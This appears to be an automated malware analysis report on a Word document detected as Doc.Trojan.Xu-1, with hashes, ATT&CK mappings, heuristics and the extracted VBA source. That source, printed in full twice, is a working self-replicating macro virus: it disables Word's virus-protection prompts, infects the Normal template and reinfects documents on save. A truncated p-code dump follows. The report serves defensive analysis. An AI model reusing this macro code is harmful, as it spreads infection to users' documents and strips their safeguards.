Office (OLE) malware analysis — malicious · 7deea43be3ea9a94

MALICIOUS

Office (OLE)

28.5 KB Created: 2000-03-15 02:10:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d2a4999528e3ebc891a1db124752bad6 SHA-1: a43390acb4dd7e2e5ec96b83ada71b61a0c85561 SHA-256: 7deea43be3ea9a9401088d367634e34b44e075703867bf8b9f63bd1112e7ceb3

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open subroutine, which is a common technique for malware delivery. The macro attempts to infect the Normal template and is detected by ClamAV as 'Doc.Trojan.Xu-1'. The presence of the Document_Open macro and the ClamAV detection strongly suggest a malicious intent to execute further payloads or establish persistence.

Heuristics 3

ClamAV: Doc.Trojan.Xu-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Xu-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7435 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7435 bytes
SHA-256: `5117bb384c839e92bc070da9276bc3f46b029ce637b58c8728976823e3990f25`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Xu_star macro Virus 1.00 Private Sub Document_Close() On Error Resume Next Dim ADL As Long, NTL As Long Dim FileNM As String FileNM = System.Application.Path & "\" & Right(Year(Date), 2) & Month(Date) & Day(Date) & Second(Time) & ".dos" Dim FNo As Long ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) = "'Xu_star macro Virus 1.00" Then FNo = FreeFile Open FileNM For Output As #FNo Print #FNo, "Xu_star 1.00a Welcome!" Close #FNo Exit Sub End If If ADL > 0 Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines If ActiveDocument.Saved = True Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines NTL, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NTL) Call ActiveDocument.Save ActiveDocument.Saved = True End If End Sub Private Sub Document_Open() On Error Resume Next Dim ADL As Long, NTL As Long Options.VirusProtection = (100 * 0) Options.ConfirmConversions = (100 * 0) Options.SaveNormalPrompt = (100 * 0) ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines 'if Normal not Xu_star virus 'Infect to normalTemplate If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "'Xu_star macro Virus 1.00" Then If NTL > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines ADL, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ADL) End If End Sub ' Processing file: /opt/analyzer/scan_staging/3598af458bec40448995f706138a078f.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3714 bytes ' Line #0: ' QuoteRem 0x0000 0x0019 "Xu_star macro Virus 1.00" ' Line #1: ' FuncDefn (Private Sub Document_Close()) ' Line #2: ' OnError (Resume Next) ' Line #3: ' Dim ' VarDefn ADL (As Long) ' VarDefn NTL (As Long) ' Line #4: ' Dim ' VarDefn FileNM (As String) ' Line #5: ' Ld System ' MemLd Application ' MemLd Path ' LitStr 0x0001 "\" ' Concat ' Ld Date ' ArgsLd Year 0x0001 ' LitDI2 0x0002 ' ArgsLd Right 0x0002 ' Concat ' Ld Date ' ArgsLd Month 0x0001 ' Concat ' Ld Date ' ArgsLd Day 0x0001 ' Concat ' Ld Time ' ArgsLd Second 0x0001 ' Concat ' LitStr 0x0004 ".dos" ' Concat ' St FileNM ' Line #6: ' Dim ' VarDefn FNo (As Long) ' Line #7: ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' St ADL ' Line #8: ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' MemLd CountOfLines ' St NTL ' Line #9: ' Line #10: ' LitDI2 0x0001 ' LitDI2 0x0001 ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' LitStr 0x001A "'Xu_star macro Virus 1.00" ' Eq ' IfBlock ' Line #11: ' Ld Friend ' St FNo ' Line #12: ' Ld FileNM ' Ld FNo ' Sharp ' LitDefault ' Open (For Output) ' Line #13: ' Ld FNo ' Sharp ' PrintChan ' LitStr 0x0016 "Xu_star 1.00a Welcome!" ' PrintItemNL ' Line #14: ' Ld FNo ' Sharp ' Close 0x0001 ' Line #15: ' ExitSub ' Line #16: ' EndIfBlock ' Line #17: ... (truncated)

SHA-256: 5117bb384c839e92bc070da9276bc3f46b029ce637b58c8728976823e3990f25

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Xu_star macro Virus  1.00
Private Sub Document_Close()
On Error Resume Next
Dim ADL As Long, NTL As Long
Dim FileNM As String
FileNM = System.Application.Path & "\" & Right(Year(Date), 2) & Month(Date) & Day(Date) & Second(Time) & ".dos"
Dim FNo As Long
ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

If ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) = "'Xu_star macro Virus  1.00" Then
FNo = FreeFile
Open FileNM For Output As #FNo
Print #FNo, "Xu_star 1.00a Welcome!"
Close #FNo
Exit Sub
End If

If ADL > 0 Then ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount

NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
If ActiveDocument.Saved = True Then
   ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines NTL, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, NTL)
   Call ActiveDocument.Save
   ActiveDocument.Saved = True
End If
End Sub


Private Sub Document_Open()
On Error Resume Next
Dim ADL As Long, NTL As Long

Options.VirusProtection = (100 * 0)
Options.ConfirmConversions = (100 * 0)
Options.SaveNormalPrompt = (100 * 0)

ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NTL = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

'if Normal not Xu_star virus
'Infect to normalTemplate
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "'Xu_star macro Virus  1.00" Then
   If NTL > 0 Then NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, LinesCount
   ADL = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
   NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.InsertLines ADL, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ADL)
End If
End Sub



' Processing file: /opt/analyzer/scan_staging/3598af458bec40448995f706138a078f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3714 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0019 "Xu_star macro Virus  1.00"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Dim 
' 	VarDefn ADL (As Long)
' 	VarDefn NTL (As Long)
' Line #4:
' 	Dim 
' 	VarDefn FileNM (As String)
' Line #5:
' 	Ld System 
' 	MemLd Application 
' 	MemLd Path 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld Date 
' 	ArgsLd Year 0x0001 
' 	LitDI2 0x0002 
' 	ArgsLd Right 0x0002 
' 	Concat 
' 	Ld Date 
' 	ArgsLd Month 0x0001 
' 	Concat 
' 	Ld Date 
' 	ArgsLd Day 0x0001 
' 	Concat 
' 	Ld Time 
' 	ArgsLd Second 0x0001 
' 	Concat 
' 	LitStr 0x0004 ".dos"
' 	Concat 
' 	St FileNM 
' Line #6:
' 	Dim 
' 	VarDefn FNo (As Long)
' Line #7:
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St ADL 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St NTL 
' Line #9:
' Line #10:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	LitStr 0x001A "'Xu_star macro Virus  1.00"
' 	Eq 
' 	IfBlock 
' Line #11:
' 	Ld Friend 
' 	St FNo 
' Line #12:
' 	Ld FileNM 
' 	Ld FNo 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #13:
' 	Ld FNo 
' 	Sharp 
' 	PrintChan 
' 	LitStr 0x0016 "Xu_star 1.00a Welcome!"
' 	PrintItemNL 
' Line #14:
' 	Ld FNo 
' 	Sharp 
' 	Close 0x0001 
' Line #15:
' 	ExitSub 
' Line #16:
' 	EndIfBlock 
' Line #17:

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.